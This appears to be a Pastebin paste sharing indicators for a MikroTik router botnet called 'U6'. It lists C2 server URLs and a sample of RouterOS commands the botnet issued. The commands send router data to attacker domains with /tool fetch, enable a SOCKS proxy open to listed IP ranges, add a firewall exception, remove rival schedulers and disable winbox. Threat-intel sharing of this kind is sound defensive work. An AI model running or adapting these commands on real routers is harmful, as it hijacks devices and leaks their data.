API tools faq
paste
Advertisement
Guest User

U6 - Mikrotik botnet

a guest
Jun 20th, 2019
2,140
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.40 KB | None | 0 0
raw download clone embed print report
  1. U6 - Mikrotik botnet
  2.  
  3. U6 C2 servers:
  4. http://bestmade.xyz/poll/8ec89aaf-63bf-4e84-a1f8-6eba14305be6
  5. http://fanmusic.xyz/poll/22908bdb-eaf2-49e1-a532-a5e4ddf6715b
  6. http://gamesone.xyz/poll/8a81a096-1fc2-49cf-97f4-8984c579bd05
  7. http://mobigifs.xyz/poll/b6db13a6-af5d-4084-9ad9-c8ca8de49627
  8. http://mobstore.xyz/poll/a0509890-2359-45b2-a7e1-f0c6cd451adf
  9. http://my1story.xyz/poll/45bdc3f3-6d48-4755-884c-e07b4255c4a2
  10. http://myphotos.xyz/poll/fadccb02-376c-4ebb-a383-a1a5e4350a09
  11. http://onlinegt.xyz/poll/18eaad9a-28a4-4b2d-b2f9-55a0c8fb30c0
  12. http://picsgifs.xyz/poll/b7eca108-d209-41f9-9e94-889de7b54746
  13.  
  14. Sample of commands pulled from the C2:
  15. { :local result [ /ip socks print as-value ]; /tool fetch url="http://gamesone.xyz/socks/8a81a096-1fc2-49cf-97f4-8984c579bd05" mode=http http-data=$result;}
  16.  
  17. { :local result [ /ip dhcp-server lease print count-only ]; /tool fetch url="http://picsgifs.xyz/clients/b7eca108-d209-41f9-9e94-889de7b54746" mode=http http-data=$result;}
  18.  
  19. { :local countRules [/ip socks access print count-only]; :for i from 0 to $countRules step=1 do= {/ip socks access remove $i} }
  20.  
  21. /ip socks access add src-address=5.188.0.0/15 action=allow /ip socks access add src-address=192.243.0.0/16 action=allow /ip socks access add src-address=5.9.0.0/16 action=allow /ip socks access add src-address=5.104.0.0/16 action=allow /ip socks access add src-address=0.0.0.0/0 action=deny
  22.  
  23. /ip firewall filter add action=accept chain=input disabled=no dst-port=3728 protocol=tcp place-before=1
  24.  
  25. /ip socks set enable=yes /ip socks set port=3728
  26.  
  27. /ip dns set servers=8.8.8.8,1.1.1.1
  28.  
  29. :do { /system scheduler set U6 interval=00:00:15 } on-error={ :put "U6 not found"}
  30.  
  31. /system scheduler set U6 interval=180s
  32.  
  33. /system scheduler remove [/system scheduler find where name!=U6]
  34.  
  35. /ip service disable winbox
  36.  
  37. /ip socks access add src-address=82.204.203.0/24 action=allow place-before=0
  38.  
  39. /ip socks access add src-address=192.243.53.0/24 action=allow place-before=0
  40.  
  41. { :foreach i in=[/ip firewall nat find action=redirect] do={ /ip firewall nat disable numbers=$i }; };
  42.  
  43. /ip socks access add src-address=94.130.51.0/24 action=allow place-before=0
  44.  
  45. { :foreach i in=[/ip socks access find] do={ :local src [/ip socks access get $i src-address]; /tool fetch url="http://picsgifs.xyz/ips/b7eca108-d209-41f9-9e94-889de7b54746/$src" mode=http; }; };
  46.  
  47. /ip socks access add src-address=95.213.221.0/24 action=allow place-before=0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!